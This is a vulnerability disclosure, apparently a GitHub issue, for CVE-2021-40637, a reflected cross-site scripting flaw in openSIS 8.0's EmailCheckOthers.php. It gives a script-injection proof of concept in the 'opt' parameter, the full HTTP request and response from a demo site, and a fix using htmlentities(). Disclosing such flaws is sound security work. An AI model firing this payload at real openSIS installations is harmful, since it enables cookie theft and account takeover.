Headline
CVE-2021-40637: Reflected XSS in EmailCheckOthers.php · Issue #199 · OS4ED/openSIS-Classic
OS4ED openSIS 8.0 is affected by cross-site scripting (XSS) in EmailCheckOthers.php. An attacker can inject JavaScript code to get the user’s cookie and take over the working session of user.
Description
By injecting Javascript code, an attacker can steal the user’s cookie and take over the user’s account. This happened because of the lack of security implementation fortype parameter. This was tested on demo website
Exploitation
Injection point:
HTTP://demo/EmailCheckOthers.php?opt=<script>alert(1)</script>&email=asfasf
Request:
GET /EmailCheckOthers.php?opt=%3Cscript%3Ealert(1)%3C/script%3E&email=asfasf HTTP/1.1 Host: demo.opensis.com User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: PHPSESSID=iadm2hjbvs4vqmskk07vcpp8n5; miniSidebar=0 Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK Date: Sun, 05 Sep 2021 09:57:28 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.29 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 6 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html
Solution:
Before using any user’s input, make sure to verify and sanitize it properly, trust nothing that’s sent from the client. In the case of XSS, please consider using htmlentities() function to encode the user’s input before printing it out to the user’s screen